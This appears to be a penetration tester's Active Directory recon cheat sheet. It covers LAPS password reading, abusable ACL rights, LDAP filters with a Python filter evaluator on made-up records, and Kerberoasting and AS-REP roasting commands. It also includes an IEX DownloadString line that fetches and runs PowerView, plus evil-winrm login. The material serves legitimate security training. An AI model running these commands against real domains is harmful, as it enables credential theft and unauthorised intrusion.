
Active Directory Recon

Enumerate everything inside the domain from a low-privileged foothold: your own rights, interesting groups and ACLs, roastable accounts, and where people are logged on.

Check User's Privileges in Domain

net user <current user> /domain

Global Group = PswReaders

If the output lists a group such as PswReaders, that group has usually been delegated read access to the LAPS password attribute (ms-Mcs-AdmPwd) on computer objects, i.e. it can read the local administrator password of those hosts:

Global Group memberships      *Domain Users         *PswReaders

# import PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

# dump the LAPS password of the hosts the group is allowed to read
Get-DomainComputer -Identity <hostname1>,<hostname2> -Properties name,ms-Mcs-AdmPwd

Access Control List (ACL)

Rights worth looking for in an ACE on a user, group or computer object:

GenericAll --> Full control over the object
GenericWrite --> Write to the object's (non-protected) attributes
WriteOwner --> Change the ownership of the object (then grant yourself the rest)
WriteDACL --> Edit the ACEs applied to the object
AllExtendedRights --> All extended rights, e.g. change password, reset password, etc.
ForceChangePassword --> Reset the object's password without knowing the current one
Self (Self-Membership) --> Add ourselves as a member of the object, for example a group

LDAP Search

Privileges needed: Domain User (any authenticated account can read most of the directory)

  1. LDAPSearch.ps1

# replace the placeholder with one of the filters below, e.g. (objectClass=user)
$ldapFilter = "PUT FILTER HERE"
# bind to the root of the current domain with the current user's credentials
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
# without paging the DC stops at 1000 results (MaxPageSize); PageSize turns on paged results
$search.PageSize = 1000

$results = $search.FindAll()
foreach ($result in $results)
{
    $object = $result.GetDirectoryEntry()
    Write-Host "Object Name = " $object.name
}
$results.Dispose()

Filters

LDAP RECON
================

# all domain controllers (516 is the RID of the "Domain Controllers" group)
(primaryGroupID=516)

# all direct members of Domain Admins (nested membership is not expanded by memberOf=;
# the matching rule 1.2.840.113556.1.4.1941 on memberOf walks nested groups)
(&(objectCategory=person)(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local))

# accounts trusted for unconstrained delegation: bitwise AND on userAccountControl,
# 524288 = 0x80000 = TRUSTED_FOR_DELEGATION (covers users and computers)
(userAccountControl:1.2.840.113556.1.4.803:=524288)

  2. Using the ActiveDirectory module

# show accounts whose description mentions a password
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -Properties * | Select-Object SAMAccountName, Description, DistinguishedName

Have User & Pass SVC?

Service accounts usually have a Service Principal Name (SPN) set. Any domain user can request a TGS for that SPN and crack the service account's password offline (Kerberoasting), so don't miss this check:

[Have SPN] Kerberoasting

# identification: list user accounts with an SPN (prompts for the password)
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>

# request the TGS tickets and save them; the output is already in hashcat format
# (mode 13100 for the usual RC4/etype 23 tickets)
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>:<password> -request -outputfile kerberoast.txt

Have User List?

Check whether any user has Kerberos pre-authentication disabled (userAccountControl flag DONT_REQ_PREAUTH, 4194304). For such users the DC hands out an AS-REP encrypted with the user's key to anyone who asks, without any credentials (AS-REP roasting).

# no credentials needed, only a list of candidate usernames (hashcat mode 18200)
impacket-GetNPUsers -dc-ip <IP DC> <domain>/ -usersfile users.txt -format hashcat

# the same from a domain-joined Windows host
Rubeus.exe asreproast /format:hashcat /outfile:C:\temp\hash.txt

# with a cracked password, log in with evil-winrm (needs WinRM on 5985/5986 and
# a user in Remote Management Users or a local admin on the target)
evil-winrm -i <ip> -u <username> -p <password>
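All of the recon filters above, and the Kerberoast and AS-REP target checks in the two sections just before this, reduce to the same few LDAP matching rules. The following is an added example, not from these notes or from any of the tools they mention: a small Python evaluator for that filter subset, run against a constructed set of AD-style records (the host, user and service names, descriptions and the password in the description are all made up). It supports only what these filters need, namely equality, * substrings and presence, the &, | and ! operators, and the bitwise-AND matching rule 1.2.840.113556.1.4.803, which is exactly what makes the userAccountControl filters work.

```python
"""Tiny LDAP filter evaluator over in-memory AD-style records (added example).

Supports the RFC 4515 subset used by the recon filters in these notes:
(attr=value), (attr=*sub*), (attr=*) presence, (attr:OID:=value) with the
bitwise-AND rule, and the &, |, ! operators.
"""
import fnmatch

BIT_AND = "1.2.840.113556.1.4.803"      # LDAP_MATCHING_RULE_BIT_AND

# userAccountControl flags referenced by the filters above
TRUSTED_FOR_DELEGATION = 0x80000        # 524288  -> unconstrained delegation
DONT_REQ_PREAUTH = 0x400000             # 4194304 -> AS-REP roastable

DA_DN = "CN=Domain Admins,CN=Users,DC=TEST,DC=local"

# Constructed sample directory. Attribute values are lists because LDAP
# attributes are multi-valued; names, descriptions and the password are made up.
DIRECTORY = [
    {"sAMAccountName": ["DC01$"], "objectClass": ["user", "computer"],
     "objectCategory": ["computer"], "primaryGroupID": ["516"],
     "userAccountControl": [str(0x2000 | TRUSTED_FOR_DELEGATION)],
     "description": ["domain controller"], "memberOf": []},
    {"sAMAccountName": ["alice"], "objectClass": ["user"],
     "objectCategory": ["person"], "primaryGroupID": ["513"],
     "userAccountControl": ["512"], "description": ["IT admin"],
     "memberOf": [DA_DN]},
    {"sAMAccountName": ["svc_sql"], "objectClass": ["user"],
     "objectCategory": ["person"], "primaryGroupID": ["513"],
     "userAccountControl": ["66048"],
     "servicePrincipalName": ["MSSQLSvc/sql01.test.local:1433"],
     "description": ["Service account, pass: Summer2023!"], "memberOf": []},
    {"sAMAccountName": ["bob"], "objectClass": ["user"],
     "objectCategory": ["person"], "primaryGroupID": ["513"],
     "userAccountControl": [str(512 | DONT_REQ_PREAUTH)],
     "description": ["Sales"], "memberOf": []},
]


def parse(text):
    """Parse an LDAP filter string into a nested tuple AST."""
    text = text.strip()
    node, pos = _parse(text, 0)
    if pos != len(text):
        raise ValueError("trailing data in filter")
    return node


def _parse(s, i):
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    op = s[i]
    if op in "&|!":                          # compound filter: (&(...)(...))
        i += 1
        kids = []
        while s[i] != ")":
            kid, i = _parse(s, i)
            kids.append(kid)
        return (op, kids), i + 1
    end = s.index(")", i)                    # simple item: attr=value
    attr, _, value = s[i:end].partition("=") # split on the FIRST '=' so DNs survive
    i = end + 1
    if attr.endswith(":"):                   # extensible match: attr:OID:=value
        attr, rule = attr[:-1].split(":", 1)
        return ("ext", attr, rule, value), i
    return ("eq", attr, value), i


def matches(node, entry):
    """Evaluate a parsed filter against one record (attribute names case-insensitive)."""
    kind = node[0]
    if kind == "&":
        return all(matches(k, entry) for k in node[1])
    if kind == "|":
        return any(matches(k, entry) for k in node[1])
    if kind == "!":
        return not matches(node[1][0], entry)
    attr = node[1]
    found = [v for k, v in entry.items() if k.lower() == attr.lower()]
    values = found[0] if found else []
    if kind == "eq":
        pattern = node[2].lower()
        if pattern == "*":                   # presence filter
            return bool(values)
        # '*' is the only LDAP wildcard; fnmatch's '?' and '[...]' do not occur in these filters
        return any(fnmatch.fnmatchcase(v.lower(), pattern) for v in values)
    if kind == "ext":
        if node[2] != BIT_AND:
            raise ValueError("unsupported matching rule " + node[2])
        mask = int(node[3])                  # match if every bit of the mask is set
        return any(int(v) & mask == mask for v in values)
    raise ValueError(kind)


def search(ldap_filter, directory=DIRECTORY):
    """Return the sAMAccountNames matching the filter (think Get-ADObject -LDAPFilter)."""
    ast = parse(ldap_filter)
    return sorted(e["sAMAccountName"][0] for e in directory if matches(ast, e))


RECON_FILTERS = {
    "domain controllers": "(primaryGroupID=516)",
    "domain admins": f"(&(objectCategory=person)(objectClass=user)(memberOf={DA_DN}))",
    "unconstrained delegation": f"(userAccountControl:{BIT_AND}:={TRUSTED_FOR_DELEGATION})",
    "password in description": "(&(objectClass=user)(description=*pass*))",
    # computer accounts also carry SPNs, so exclude them to get Kerberoast targets
    "kerberoastable": "(&(objectClass=user)(!(objectClass=computer))(servicePrincipalName=*))",
    "asrep roastable": f"(&(objectClass=user)(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH}))",
}

if __name__ == "__main__":
    for label, flt in RECON_FILTERS.items():
        print(f"{label}: {flt}\n  -> {search(flt)}")
```

Running it prints, for each filter, which constructed account it selects; swap DIRECTORY for records exported from a real domain to check a filter before you send it to the DC. The bitwise-AND rule is the part people get wrong: the filter matches only when every bit of the given mask is set, which is why a single flag value such as 524288 or 4194304 works as the argument.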

TGT?

If you hold a TGT, or a key you can request one with, see HTB Scrambled for a worked case of authenticating with Kerberos tickets instead of passwords.

PsLoggedon.exe

Lists who is logged on to a remote computer, both interactively (read from the remote registry, so the Remote Registry service must be reachable) and via resource shares (NetSessionEnum). Useful for finding where admins are logged on before moving laterally.

.\PsLoggedon.exe \\<computername>

Seatbelt.exe

# run every host-survey check (OS, users, groups, credentials, services, ...); review the output for privesc and recon leads
.\Seatbelt.exe -group=all


Last updated 8 months ago

ref:

https://www.youtube.com/watch?v=-xF6bvbXCGE&list=PL8383xoY3ZibjcFWjDhabUGOjoZ4Ke8Yu&index=2